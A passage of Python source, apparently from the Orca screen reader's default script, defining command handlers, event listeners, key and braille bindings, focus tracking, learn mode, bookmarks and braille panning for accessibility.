NO_BREAK_SPACE_CHARACTER = '\u00a0'
# generatorCache
#
DISPLAYED_LABEL = 'displayedLabel'
DISPLAYED_TEXT = 'displayedText'
KEY_BINDING = 'keyBinding'
NESTING_LEVEL = 'nestingLevel'
NODE_LEVEL = 'nodeLevel'
REAL_ACTIVE_DESCENDANT = 'realActiveDescendant'
def __init__(self, app):
"""Creates a new script for the given application.
Arguments:
- app: the application to create a script for.
"""
script.Script.__init__(self, app)
self.flatReviewContext = None
self.windowActivateTime = None
self.targetCursorCell = None
self.sound = sound_utils.SoundUtils()
self.sound.createSimpePipeline()
self.justEnteredFlatReviewMode = False
self.digits = '0123456789'
self.whitespace = ' \t\n\r\v\f'
# Unicode currency symbols (populated by the
# getUnicodeCurrencySymbols() routine).
#
self._unicodeCurrencySymbols = []
# Used to determine whether progress bar value changes presented.
self.lastProgressBarTime = {}
self.lastProgressBarValue = {}
self.lastSelectedMenu = None
# A dictionary of non-standardly-named text attributes and their
# Atk equivalents.
#
self.attributeNamesDict = {}
# Keep track of the last time we issued a mouse routing command
# so that we can guess if a change resulted from our moving the
# pointer.
#
self.lastMouseRoutingTime = None
# The last location of the mouse, which we might want if routing
# the pointer elsewhere.
#
self.oldMouseCoordinates = [0, 0]
# Used to copy/append the current flat review contents to the
# clipboard.
#
self.currentReviewContents = ""
self._lastWord = ""
self._lastWordCheckedForSpelling = ""
self._inSayAll = False
self._sayAllIsInterrupted = False
self._sayAllContexts = []
if app:
app.setCacheMask(
pyatspi.cache.DEFAULT ^ pyatspi.cache.CHILDREN ^ pyatspi.cache.NAME)
def setupInputEventHandlers(self):
"""Defines InputEventHandler fields for this script that can be
called by the key and braille bindings."""
self.inputEventHandlers["routePointerToItemHandler"] = \
input_event.InputEventHandler(
Script.routePointerToItem,
cmdnames.ROUTE_POINTER_TO_ITEM)
self.inputEventHandlers["leftClickReviewItemHandler"] = \
input_event.InputEventHandler(
Script.leftClickReviewItem,
cmdnames.LEFT_CLICK_REVIEW_ITEM)
self.inputEventHandlers["rightClickReviewItemHandler"] = \
input_event.InputEventHandler(
Script.rightClickReviewItem,
cmdnames.RIGHT_CLICK_REVIEW_ITEM)
self.inputEventHandlers["sayAllHandler"] = \
input_event.InputEventHandler(
Script.sayAll,
cmdnames.SAY_ALL)
self.inputEventHandlers["whereAmIBasicHandler"] = \
input_event.InputEventHandler(
Script.whereAmIBasic,
cmdnames.WHERE_AM_I_BASIC)
self.inputEventHandlers["whereAmIDetailedHandler"] = \
input_event.InputEventHandler(
Script.whereAmIDetailed,
cmdnames.WHERE_AM_I_DETAILED)
self.inputEventHandlers["getTitleHandler"] = \
input_event.InputEventHandler(
Script.presentTitle,
cmdnames.PRESENT_TITLE)
self.inputEventHandlers["getStatusBarHandler"] = \
input_event.InputEventHandler(
Script.presentStatusBar,
cmdnames.PRESENT_STATUS_BAR)
self.inputEventHandlers["findHandler"] = \
input_event.InputEventHandler(
orca.showFindGUI,
cmdnames.SHOW_FIND_GUI)
self.inputEventHandlers["findNextHandler"] = \
input_event.InputEventHandler(
Script.findNext,
cmdnames.FIND_NEXT)
self.inputEventHandlers["findPreviousHandler"] = \
input_event.InputEventHandler(
Script.findPrevious,
cmdnames.FIND_PREVIOUS)
self.inputEventHandlers["toggleFlatReviewModeHandler"] = \
input_event.InputEventHandler(
Script.toggleFlatReviewMode,
cmdnames.TOGGLE_FLAT_REVIEW)
self.inputEventHandlers["reviewPreviousLineHandler"] = \
input_event.InputEventHandler(
Script.reviewPreviousLine,
cmdnames.REVIEW_PREVIOUS_LINE)
self.inputEventHandlers["reviewHomeHandler"] = \
input_event.InputEventHandler(
Script.reviewHome,
cmdnames.REVIEW_HOME)
self.inputEventHandlers["reviewCurrentLineHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentLine,
cmdnames.REVIEW_CURRENT_LINE)
self.inputEventHandlers["reviewSpellCurrentLineHandler"] = \
input_event.InputEventHandler(
Script.reviewSpellCurrentLine,
cmdnames.REVIEW_SPELL_CURRENT_LINE)
self.inputEventHandlers["reviewPhoneticCurrentLineHandler"] = \
input_event.InputEventHandler(
Script.reviewPhoneticCurrentLine,
cmdnames.REVIEW_PHONETIC_CURRENT_LINE)
self.inputEventHandlers["reviewNextLineHandler"] = \
input_event.InputEventHandler(
Script.reviewNextLine,
cmdnames.REVIEW_NEXT_LINE)
self.inputEventHandlers["reviewEndHandler"] = \
input_event.InputEventHandler(
Script.reviewEnd,
cmdnames.REVIEW_END)
self.inputEventHandlers["reviewPreviousItemHandler"] = \
input_event.InputEventHandler(
Script.reviewPreviousItem,
cmdnames.REVIEW_PREVIOUS_ITEM)
self.inputEventHandlers["reviewAboveHandler"] = \
input_event.InputEventHandler(
Script.reviewAbove,
cmdnames.REVIEW_ABOVE)
self.inputEventHandlers["reviewCurrentItemHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentItem,
cmdnames.REVIEW_CURRENT_ITEM)
self.inputEventHandlers["reviewSpellCurrentItemHandler"] = \
input_event.InputEventHandler(
Script.reviewSpellCurrentItem,
cmdnames.REVIEW_SPELL_CURRENT_ITEM)
self.inputEventHandlers["reviewPhoneticCurrentItemHandler"] = \
input_event.InputEventHandler(
Script.reviewPhoneticCurrentItem,
cmdnames.REVIEW_PHONETIC_CURRENT_ITEM)
self.inputEventHandlers["reviewNextItemHandler"] = \
input_event.InputEventHandler(
Script.reviewNextItem,
cmdnames.REVIEW_NEXT_ITEM)
self.inputEventHandlers["reviewCurrentAccessibleHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentAccessible,
cmdnames.REVIEW_CURRENT_ACCESSIBLE)
self.inputEventHandlers["reviewBelowHandler"] = \
input_event.InputEventHandler(
Script.reviewBelow,
cmdnames.REVIEW_BELOW)
self.inputEventHandlers["reviewPreviousCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewPreviousCharacter,
cmdnames.REVIEW_PREVIOUS_CHARACTER)
self.inputEventHandlers["reviewEndOfLineHandler"] = \
input_event.InputEventHandler(
Script.reviewEndOfLine,
cmdnames.REVIEW_END_OF_LINE)
self.inputEventHandlers["reviewBottomLeftHandler"] = \
input_event.InputEventHandler(
Script.reviewBottomLeft,
cmdnames.REVIEW_BOTTOM_LEFT)
self.inputEventHandlers["reviewCurrentCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewCurrentCharacter,
cmdnames.REVIEW_CURRENT_CHARACTER)
self.inputEventHandlers["reviewSpellCurrentCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewSpellCurrentCharacter,
cmdnames.REVIEW_SPELL_CURRENT_CHARACTER)
self.inputEventHandlers["reviewUnicodeCurrentCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewUnicodeCurrentCharacter,
cmdnames.REVIEW_UNICODE_CURRENT_CHARACTER)
self.inputEventHandlers["reviewNextCharacterHandler"] = \
input_event.InputEventHandler(
Script.reviewNextCharacter,
cmdnames.REVIEW_NEXT_CHARACTER)
self.inputEventHandlers["flatReviewCopyHandler"] = \
input_event.InputEventHandler(
Script.flatReviewCopy,
cmdnames.FLAT_REVIEW_COPY)
self.inputEventHandlers["flatReviewAppendHandler"] = \
input_event.InputEventHandler(
Script.flatReviewAppend,
cmdnames.FLAT_REVIEW_APPEND)
self.inputEventHandlers["toggleTableCellReadModeHandler"] = \
input_event.InputEventHandler(
Script.toggleTableCellReadMode,
cmdnames.TOGGLE_TABLE_CELL_READ_MODE)
self.inputEventHandlers["readCharAttributesHandler"] = \
input_event.InputEventHandler(
Script.readCharAttributes,
cmdnames.READ_CHAR_ATTRIBUTES)
self.inputEventHandlers["panBrailleLeftHandler"] = \
input_event.InputEventHandler(
Script.panBrailleLeft,
cmdnames.PAN_BRAILLE_LEFT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["panBrailleRightHandler"] = \
input_event.InputEventHandler(
Script.panBrailleRight,
cmdnames.PAN_BRAILLE_RIGHT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["goBrailleHomeHandler"] = \
input_event.InputEventHandler(
Script.goBrailleHome,
cmdnames.GO_BRAILLE_HOME)
self.inputEventHandlers["contractedBrailleHandler"] = \
input_event.InputEventHandler(
Script.setContractedBraille,
cmdnames.SET_CONTRACTED_BRAILLE)
self.inputEventHandlers["processRoutingKeyHandler"] = \
input_event.InputEventHandler(
Script.processRoutingKey,
cmdnames.PROCESS_ROUTING_KEY)
self.inputEventHandlers["processBrailleCutBeginHandler"] = \
input_event.InputEventHandler(
Script.processBrailleCutBegin,
cmdnames.PROCESS_BRAILLE_CUT_BEGIN)
self.inputEventHandlers["processBrailleCutLineHandler"] = \
input_event.InputEventHandler(
Script.processBrailleCutLine,
cmdnames.PROCESS_BRAILLE_CUT_LINE)
self.inputEventHandlers["enterLearnModeHandler"] = \
input_event.InputEventHandler(
Script.enterLearnMode,
cmdnames.ENTER_LEARN_MODE)
self.inputEventHandlers["decreaseSpeechRateHandler"] = \
input_event.InputEventHandler(
speech.decreaseSpeechRate,
cmdnames.DECREASE_SPEECH_RATE)
self.inputEventHandlers["increaseSpeechRateHandler"] = \
input_event.InputEventHandler(
speech.increaseSpeechRate,
cmdnames.INCREASE_SPEECH_RATE)
self.inputEventHandlers["decreaseSpeechPitchHandler"] = \
input_event.InputEventHandler(
speech.decreaseSpeechPitch,
cmdnames.DECREASE_SPEECH_PITCH)
self.inputEventHandlers["increaseSpeechPitchHandler"] = \
input_event.InputEventHandler(
speech.increaseSpeechPitch,
cmdnames.INCREASE_SPEECH_PITCH)
self.inputEventHandlers["decreaseSpeechVolumeHandler"] = \
input_event.InputEventHandler(
speech.decreaseSpeechVolume,
cmdnames.DECREASE_SPEECH_VOLUME)
self.inputEventHandlers["increaseSpeechVolumeHandler"] = \
input_event.InputEventHandler(
speech.increaseSpeechVolume,
cmdnames.INCREASE_SPEECH_VOLUME)
self.inputEventHandlers["shutdownHandler"] = \
input_event.InputEventHandler(
orca.quitOrca,
cmdnames.QUIT_ORCA)
self.inputEventHandlers["preferencesSettingsHandler"] = \
input_event.InputEventHandler(
orca.showPreferencesGUI,
cmdnames.SHOW_PREFERENCES_GUI)
self.inputEventHandlers["appPreferencesSettingsHandler"] = \
input_event.InputEventHandler(
orca.showAppPreferencesGUI,
cmdnames.SHOW_APP_PREFERENCES_GUI)
self.inputEventHandlers["toggleSilenceSpeechHandler"] = \
input_event.InputEventHandler(
Script.toggleSilenceSpeech,
cmdnames.TOGGLE_SPEECH)
self.inputEventHandlers["toggleSpeechVerbosityHandler"] = \
input_event.InputEventHandler(
Script.toggleSpeechVerbosity,
cmdnames.TOGGLE_SPEECH_VERBOSITY)
self.inputEventHandlers[ \
"toggleSpeakingIndentationJustificationHandler"] = \
input_event.InputEventHandler(
Script.toggleSpeakingIndentationJustification,
cmdnames.TOGGLE_SPOKEN_INDENTATION_AND_JUSTIFICATION)
self.inputEventHandlers["cycleSpeakingPunctuationLevelHandler"] = \
input_event.InputEventHandler(
Script.cycleSpeakingPunctuationLevel,
cmdnames.CYCLE_PUNCTUATION_LEVEL)
self.inputEventHandlers["cycleSettingsProfileHandler"] = \
input_event.InputEventHandler(
Script.cycleSettingsProfile,
cmdnames.CYCLE_SETTINGS_PROFILE)
self.inputEventHandlers["cycleCapitalizationStyleHandler"] = \
input_event.InputEventHandler(
Script.cycleCapitalizationStyle,
cmdnames.CYCLE_CAPITALIZATION_STYLE)
self.inputEventHandlers["cycleKeyEchoHandler"] = \
input_event.InputEventHandler(
Script.cycleKeyEcho,
cmdnames.CYCLE_KEY_ECHO)
self.inputEventHandlers["cycleDebugLevelHandler"] = \
input_event.InputEventHandler(
Script.cycleDebugLevel,
cmdnames.CYCLE_DEBUG_LEVEL)
self.inputEventHandlers["goToPrevBookmark"] = \
input_event.InputEventHandler(
Script.goToPrevBookmark,
cmdnames.BOOKMARK_GO_TO_PREVIOUS)
self.inputEventHandlers["goToBookmark"] = \
input_event.InputEventHandler(
Script.goToBookmark,
cmdnames.BOOKMARK_GO_TO)
self.inputEventHandlers["goToNextBookmark"] = \
input_event.InputEventHandler(
Script.goToNextBookmark,
cmdnames.BOOKMARK_GO_TO_NEXT)
self.inputEventHandlers["addBookmark"] = \
input_event.InputEventHandler(
Script.addBookmark,
cmdnames.BOOKMARK_ADD)
self.inputEventHandlers["saveBookmarks"] = \
input_event.InputEventHandler(
Script.saveBookmarks,
cmdnames.BOOKMARK_SAVE)
self.inputEventHandlers["toggleMouseReviewHandler"] = \
input_event.InputEventHandler(
mouse_review.toggle,
cmdnames.MOUSE_REVIEW_TOGGLE)
self.inputEventHandlers["presentTimeHandler"] = \
input_event.InputEventHandler(
Script.presentTime,
cmdnames.PRESENT_CURRENT_TIME)
self.inputEventHandlers["presentDateHandler"] = \
input_event.InputEventHandler(
Script.presentDate,
cmdnames.PRESENT_CURRENT_DATE)
self.inputEventHandlers["bypassNextCommandHandler"] = \
input_event.InputEventHandler(
Script.bypassNextCommand,
cmdnames.BYPASS_NEXT_COMMAND)
self.inputEventHandlers.update(notification_messages.inputEventHandlers)
def getInputEventHandlerKey(self, inputEventHandler):
"""Returns the name of the key that contains an inputEventHadler
passed as argument
"""
for keyName, handler in list(self.inputEventHandlers.items()):
if handler == inputEventHandler:
return keyName
return None
def getListeners(self):
"""Sets up the AT-SPI event listeners for this script.
"""
listeners = script.Script.getListeners(self)
listeners["focus:"] = \
self.onFocus
#listeners["keyboard:modifiers"] = \
# self.noOp
listeners["document:reload"] = \
self.onDocumentReload
listeners["document:load-complete"] = \
self.onDocumentLoadComplete
listeners["document:load-stopped"] = \
self.onDocumentLoadStopped
listeners["mouse:button"] = \
self.onMouseButton
listeners["object:property-change:accessible-name"] = \
self.onNameChanged
listeners["object:text-caret-moved"] = \
self.onCaretMoved
listeners["object:text-changed:delete"] = \
self.onTextDeleted
listeners["object:text-changed:insert"] = \
self.onTextInserted
listeners["object:active-descendant-changed"] = \
self.onActiveDescendantChanged
listeners["object:children-changed"] = \
self.onChildrenChanged
listeners["object:state-changed:active"] = \
self.onActiveChanged
listeners["object:state-changed:busy"] = \
self.onBusyChanged
listeners["object:state-changed:focused"] = \
self.onFocusedChanged
listeners["object:state-changed:showing"] = \
self.onShowingChanged
listeners["object:state-changed:checked"] = \
self.onCheckedChanged
listeners["object:state-changed:pressed"] = \
self.onPressedChanged
listeners["object:state-changed:indeterminate"] = \
self.onIndeterminateChanged
listeners["object:state-changed:expanded"] = \
self.onExpandedChanged
listeners["object:state-changed:selected"] = \
self.onSelectedChanged
listeners["object:state-changed:sensitive"] = \
self.onSensitiveChanged
listeners["object:text-attributes-changed"] = \
self.onTextAttributesChanged
listeners["object:text-selection-changed"] = \
self.onTextSelectionChanged
listeners["object:selection-changed"] = \
self.onSelectionChanged
listeners["object:property-change:accessible-value"] = \
self.onValueChanged
listeners["object:value-changed"] = \
self.onValueChanged
listeners["object:column-reordered"] = \
self.onColumnReordered
listeners["object:row-reordered"] = \
self.onRowReordered
listeners["window:activate"] = \
self.onWindowActivated
listeners["window:deactivate"] = \
self.onWindowDeactivated
listeners["window:create"] = \
self.onWindowCreated
return listeners
def __getDesktopBindings(self):
"""Returns an instance of keybindings.KeyBindings that use the
numeric keypad for focus tracking and flat review.
"""
import orca.desktop_keyboardmap as desktop_keyboardmap
keyBindings = keybindings.KeyBindings()
keyBindings.load(desktop_keyboardmap.keymap, self.inputEventHandlers)
return keyBindings
def __getLaptopBindings(self):
"""Returns an instance of keybindings.KeyBindings that use the
the main keyboard keys for focus tracking and flat review.
"""
import orca.laptop_keyboardmap as laptop_keyboardmap
keyBindings = keybindings.KeyBindings()
keyBindings.load(laptop_keyboardmap.keymap, self.inputEventHandlers)
return keyBindings
def getKeyBindings(self):
"""Defines the key bindings for this script.
Returns an instance of keybindings.KeyBindings.
"""
keyBindings = script.Script.getKeyBindings(self)
bindings = self.getDefaultKeyBindings()
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
bindings = self.getToolkitKeyBindings()
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
bindings = self.getAppKeyBindings()
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
try:
keyBindings = _settingsManager.overrideKeyBindings(self, keyBindings)
except:
debug.println(debug.LEVEL_WARNING,
"WARNING: problem overriding keybindings:")
debug.printException(debug.LEVEL_WARNING)
return keyBindings
def getDefaultKeyBindings(self):
"""Returns the default script's keybindings, i.e. without any of
the toolkit or application specific commands added."""
keyBindings = keybindings.KeyBindings()
layout = _settingsManager.getSetting('keyboardLayout')
if layout == settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP:
for keyBinding in self.__getDesktopBindings().keyBindings:
keyBindings.add(keyBinding)
else:
for keyBinding in self.__getLaptopBindings().keyBindings:
keyBindings.add(keyBinding)
import orca.common_keyboardmap as common_keyboardmap
keyBindings.load(common_keyboardmap.keymap, self.inputEventHandlers)
return keyBindings
def getBrailleBindings(self):
"""Defines the braille bindings for this script.
Returns a dictionary where the keys are BrlTTY commands and the
values are InputEventHandler instances.
"""
brailleBindings = script.Script.getBrailleBindings(self)
try:
brailleBindings[braille.brlapi.KEY_CMD_FWINLT] = \
self.inputEventHandlers["panBrailleLeftHandler"]
brailleBindings[braille.brlapi.KEY_CMD_FWINRT] = \
self.inputEventHandlers["panBrailleRightHandler"]
brailleBindings[braille.brlapi.KEY_CMD_LNUP] = \
self.inputEventHandlers["reviewAboveHandler"]
brailleBindings[braille.brlapi.KEY_CMD_LNDN] = \
self.inputEventHandlers["reviewBelowHandler"]
brailleBindings[braille.brlapi.KEY_CMD_FREEZE] = \
self.inputEventHandlers["toggleFlatReviewModeHandler"]
brailleBindings[braille.brlapi.KEY_CMD_TOP_LEFT] = \
self.inputEventHandlers["reviewHomeHandler"]
brailleBindings[braille.brlapi.KEY_CMD_BOT_LEFT] = \
self.inputEventHandlers["reviewBottomLeftHandler"]
brailleBindings[braille.brlapi.KEY_CMD_HOME] = \
self.inputEventHandlers["goBrailleHomeHandler"]
brailleBindings[braille.brlapi.KEY_CMD_SIXDOTS] = \
self.inputEventHandlers["contractedBrailleHandler"]
brailleBindings[braille.brlapi.KEY_CMD_ROUTE] = \
self.inputEventHandlers["processRoutingKeyHandler"]
brailleBindings[braille.brlapi.KEY_CMD_CUTBEGIN] = \
self.inputEventHandlers["processBrailleCutBeginHandler"]
brailleBindings[braille.brlapi.KEY_CMD_CUTLINE] = \
self.inputEventHandlers["processBrailleCutLineHandler"]
except AttributeError:
debug.println(debug.LEVEL_CONFIGURATION,
"WARNING: braille bindings unavailable:")
except:
debug.println(debug.LEVEL_CONFIGURATION,
"WARNING: braille bindings unavailable:")
debug.printException(debug.LEVEL_CONFIGURATION)
return brailleBindings
def deactivate(self):
"""Called when this script is deactivated."""
self._inSayAll = False
self._sayAllIsInterrupted = False
self.pointOfReference = {}
def processKeyboardEvent(self, keyboardEvent):
"""Processes the given keyboard event. It uses the super
class equivalent to do most of the work. The only thing done here
is to detect when the user is trying to get out of learn mode.
Arguments:
- keyboardEvent: an instance of input_event.KeyboardEvent
"""
return script.Script.processKeyboardEvent(self, keyboardEvent)
def _saveFocusedObjectInfo(self, obj):
"""Saves some basic information about obj. Note that this method is
intended to be called primarily (if not only) by locusOfFocusChanged().
It is expected that accessible event callbacks will update the point
of reference data specific to that event. The goal here is to weed
out duplicate events."""
if not obj:
return
try:
role = obj.getRole()
state = obj.getState()
name = obj.name
except:
return
# We want to save the name because some apps and toolkits emit name
# changes after the focus or selection has changed, even though the
# name has not.
names = self.pointOfReference.get('names', {})
names[hash(obj)] = name
self.pointOfReference['names'] = names
# We want to save the offset for text objects because some apps and
# toolkits emit caret-moved events immediately after a text object
# gains focus, even though the caret has not actually moved.
try:
text = obj.queryText()
except:
pass
else:
self._saveLastCursorPosition(obj, max(0, text.caretOffset))
textSelections = self.pointOfReference.get('textSelections', {})
textSelections[hash(obj)] = text.getSelection(0)
self.pointOfReference['textSelections'] = textSelections
# We want to save the current row and column of a newly focused
# or selected table cell so that on subsequent cell focus/selection
# we only present the changed location.
if role == pyatspi.ROLE_TABLE_CELL:
try:
table = obj.parent.queryTable()
except:
pass
else:
index = self.utilities.cellIndex(obj)
column = table.getColumnAtIndex(index)
row = table.getRowAtIndex(index)
self.pointOfReference['lastColumn'] = column
self.pointOfReference['lastRow'] = row
else:
self.pointOfReference['lastColumn'] = -1
self.pointOfReference['lastRow'] = -1
self.pointOfReference['checkedChange'] = \
hash(obj), state.contains(pyatspi.STATE_CHECKED)
def locusOfFocusChanged(self, event, oldLocusOfFocus, newLocusOfFocus):
"""Called when the visual object with focus changes.
Arguments:
- event: if not None, the Event that caused the change
- oldLocusOfFocus: Accessible that is the old locus of focus
- newLocusOfFocus: Accessible that is the new locus of focus
"""
if not newLocusOfFocus:
orca_state.noFocusTimeStamp = time.time()
return
if newLocusOfFocus.getState().contains(pyatspi.STATE_DEFUNCT):
return
if self.utilities.isSameObject(oldLocusOfFocus, newLocusOfFocus):
return
try:
if self.findCommandRun:
# Then the Orca Find dialog has just given up focus
# to the original window. We don't want to speak
# the window title, current line, etc.
return
except:
pass
if self.flatReviewContext:
self.toggleFlatReviewMode()
self.updateBraille(newLocusOfFocus)
shouldNotInterrupt = \
self.windowActivateTime and time.time() - self.windowActivateTime < 1
# [[[TODO: WDW - this should move to the generator.]]]
if newLocusOfFocus.getRole() == pyatspi.ROLE_LINK:
voice = self.voices[settings.HYPERLINK_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
utterances = self.speechGenerator.generateSpeech(
newLocusOfFocus,
priorObj=oldLocusOfFocus)
speech.speak(utterances, voice, not shouldNotInterrupt)
self._saveFocusedObjectInfo(newLocusOfFocus)
def activate(self):
"""Called when this script is activated."""
_settingsManager.loadAppSettings(self)
braille.setupKeyRanges(list(self.brailleBindings.keys()))
speech.updatePunctuationLevel()
def updateBraille(self, obj, extraRegion=None):
"""Updates the braille display to show the give object.
Arguments:
- obj: the Accessible
- extra: extra Region to add to the end
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update disabled")
return
if not obj:
return
self.clearBraille()
line = self.getNewBrailleLine()
braille.addLine(line)
result = self.brailleGenerator.generateBraille(obj)
self.addBrailleRegionsToLine(result[0], line)
if extraRegion:
self.addBrailleRegionToLine(extraRegion, line)
if extraRegion:
self.setBrailleFocus(extraRegion)
else:
self.setBrailleFocus(result[1])
self.refreshBraille(True)
########################################################################
# #
# INPUT EVENT HANDLERS (AKA ORCA COMMANDS) #
# #
########################################################################
def bypassNextCommand(self, inputEvent=None):
"""Causes the next keyboard command to be ignored by Orca
and passed along to the current application.
Returns True to indicate the input event has been consumed.
"""
self.presentMessage(messages.BYPASS_MODE_ENABLED)
orca_state.bypassNextCommand = True
return True
def enterLearnMode(self, inputEvent=None):
"""Turns learn mode on. The user must press the escape key to exit
learn mode.
Returns True to indicate the input event has been consumed.
"""
if orca_state.learnModeEnabled:
return True
self.presentMessage(messages.VERSION)
self.speakMessage(messages.LEARN_MODE_START_SPEECH)
self.displayBrailleMessage(messages.LEARN_MODE_START_BRAILLE)
orca_state.learnModeEnabled = True
return True
def exitLearnMode(self, inputEvent=None):
"""Turns learn mode off.
Returns True to indicate the input event has been consumed.
"""
if not orca_state.learnModeEnabled:
return False
if isinstance(inputEvent, input_event.KeyboardEvent) \
and not inputEvent.event_string == 'Escape':
return False
self.presentMessage(messages.LEARN_MODE_STOP)
orca_state.learnModeEnabled = False
return True
def listOrcaShortcuts(self, inputEvent=None):
"""Shows a simple gui listing Orca's bound commands."""
if not inputEvent or inputEvent.event_string == "F2":
bound = self.getDefaultKeyBindings().getBoundBindings()
title = messages.shortcutsFoundOrca(len(bound))
else:
try:
appName = self.app.name
except AttributeError:
appName = messages.APPLICATION_NO_NAME
bound = self.getAppKeyBindings().getBoundBindings()
bound.extend(self.getToolkitKeyBindings().getBoundBindings())
title = messages.shortcutsFoundApp(len(bound), appName)
if not bound:
self.presentMessage(title)
return True
self.exitLearnMode()
rows = [(kb.handler.function,
kb.handler.description,
kb.asString()) for kb in bound]
sorted(rows, key=lambda cmd: cmd[2])
header1 = guilabels.KB_HEADER_FUNCTION
header2 = guilabels.KB_HEADER_KEY_BINDING
commandlist.showUI(title, ("", header1, header2), rows, False)
return True
def findNext(self, inputEvent):
"""Searches forward for the next instance of the string
searched for via the Orca Find dialog. Other than direction
and the starting point, the search options initially specified
(case sensitivity, window wrap, and full/partial match) are
preserved.
"""
lastQuery = find.getLastQuery()
if lastQuery:
lastQuery.searchBackwards = False
lastQuery.startAtTop = False
self.find(lastQuery)
else:
orca.showFindGUI()
def findPrevious(self, inputEvent):
"""Searches backwards for the next instance of the string
searched for via the Orca Find dialog. Other than direction
and the starting point, the search options initially specified
(case sensitivity, window wrap, and full/or partial match) are
preserved.
"""
lastQuery = find.getLastQuery()
if lastQuery:
lastQuery.searchBackwards = True
lastQuery.startAtTop = False
self.find(lastQuery)
else:
orca.showFindGUI()
def addBookmark(self, inputEvent):
""" Add an in-page accessible object bookmark for this key.
Delegates to Bookmark.addBookmark """
bookmarks = self.getBookmarks()
bookmarks.addBookmark(inputEvent)
def goToBookmark(self, inputEvent):
""" Go to the bookmark indexed by inputEvent.hw_code. Delegates to
Bookmark.goToBookmark """
bookmarks = self.getBookmarks()
bookmarks.goToBookmark(inputEvent)
def goToNextBookmark(self, inputEvent):
""" Go to the next bookmark location. If no bookmark has yet to be
selected, the first bookmark will be used. Delegates to
Bookmark.goToNextBookmark """
bookmarks = self.getBookmarks()
bookmarks.goToNextBookmark(inputEvent)
def goToPrevBookmark(self, inputEvent):
""" Go to the previous bookmark location. If no bookmark has yet to
be selected, the first bookmark will be used. Delegates to
Bookmark.goToPrevBookmark """
bookmarks = self.getBookmarks()
bookmarks.goToPrevBookmark(inputEvent)
def saveBookmarks(self, inputEvent):
""" Save the bookmarks for this script. Delegates to
Bookmark.saveBookmarks """
bookmarks = self.getBookmarks()
bookmarks.saveBookmarks(inputEvent)
def panBrailleLeft(self, inputEvent=None, panAmount=0):
"""Pans the braille display to the left. If panAmount is non-zero,
the display is panned by that many cells. If it is 0, the display
is panned one full display width. In flat review mode, panning
beyond the beginning will take you to the end of the previous line.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to character
associated with cell 0."""
if self.flatReviewContext:
if self.isBrailleBeginningShowing():
self.flatReviewContext.goBegin(flat_review.Context.LINE)
self.reviewPreviousCharacter(inputEvent)
else:
self.panBrailleInDirection(panAmount, panToLeft=True)
# This will update our target cursor cell
#
self._setFlatReviewContextToBeginningOfBrailleDisplay()
[charString, x, y, width, height] = \
self.flatReviewContext.getCurrent(flat_review.Context.CHAR)
self.targetCursorCell = 1
self.updateBrailleReview(self.targetCursorCell)
elif self.isBrailleBeginningShowing() and orca_state.locusOfFocus \
and self.utilities.isTextArea(orca_state.locusOfFocus):
# If we're at the beginning of a line of a multiline text
# area, then force it's caret to the end of the previous
# line. The assumption here is that we're currently
# viewing the line that has the caret -- which is a pretty
# good assumption for focus tacking mode. When we set the
# caret position, we will get a caret event, which will
# then update the braille.
#
text = orca_state.locusOfFocus.queryText()
[lineString, startOffset, endOffset] = text.getTextAtOffset(
text.caretOffset,
pyatspi.TEXT_BOUNDARY_LINE_START)
movedCaret = False
if startOffset > 0:
movedCaret = text.setCaretOffset(startOffset - 1)
# If we didn't move the caret and we're in a terminal, we
# jump into flat review to review the text. See
# http://bugzilla.gnome.org/show_bug.cgi?id=482294.
#
if (not movedCaret) \
and (orca_state.locusOfFocus.getRole() \
== pyatspi.ROLE_TERMINAL):
context = self.getFlatReviewContext()
context.goBegin(flat_review.Context.LINE)
self.reviewPreviousCharacter(inputEvent)
else:
self.panBrailleInDirection(panAmount, panToLeft=True)
# We might be panning through a flashed message.
#
braille.resetFlashTimer()
self.refreshBraille(False, stopFlash=False)
return True
def panBrailleLeftOneChar(self, inputEvent=None):
"""Nudges the braille display one character to the left.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to character
associated with cell 0."""
self.panBrailleLeft(inputEvent, 1)
def panBrailleRight(self, inputEvent=None, panAmount=0):
"""Pans the braille display to the right. If panAmount is non-zero,
the display is panned by that many cells. If it is 0, the display
is panned one full display width. In flat review mode, panning
beyond the end will take you to the begininng of the next line.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to character
associated with cell 0."""
if self.flatReviewContext:
if self.isBrailleEndShowing():
self.flatReviewContext.goEnd(flat_review.Context.LINE)
self.reviewNextCharacter(inputEvent)
else:
self.panBrailleInDirection(panAmount, panToLeft=False)
# This will update our target cursor cell
#
self._setFlatReviewContextToBeginningOfBrailleDisplay()
[charString, x, y, width, height] = \
self.flatReviewContext.getCurrent(flat_review.Context.CHAR)
self.targetCursorCell = 1
self.updateBrailleReview(self.targetCursorCell)
elif self.isBrailleEndShowing() and orca_state.locusOfFocus \
and self.utilities.isTextArea(orca_state.locusOfFocus):
# If we're at the end of a line of a multiline text area, then
# force it's caret to the beginning of the next line. The
# assumption here is that we're currently viewing the line that
# has the caret -- which is a pretty good assumption for focus
# tacking mode. When we set the caret position, we will get a
# caret event, which will then update the braille.
#
text = orca_state.locusOfFocus.queryText()
[lineString, startOffset, endOffset] = text.getTextAtOffset(
text.caretOffset,
pyatspi.TEXT_BOUNDARY_LINE_START)
if endOffset < text.characterCount:
text.setCaretOffset(endOffset)
else:
self.panBrailleInDirection(panAmount, panToLeft=False)
# We might be panning through a flashed message.
#
braille.resetFlashTimer()
self.refreshBraille(False, stopFlash=False)
return True
def panBrailleRightOneChar(self, inputEvent=None):
"""Nudges the braille display one character to the right.
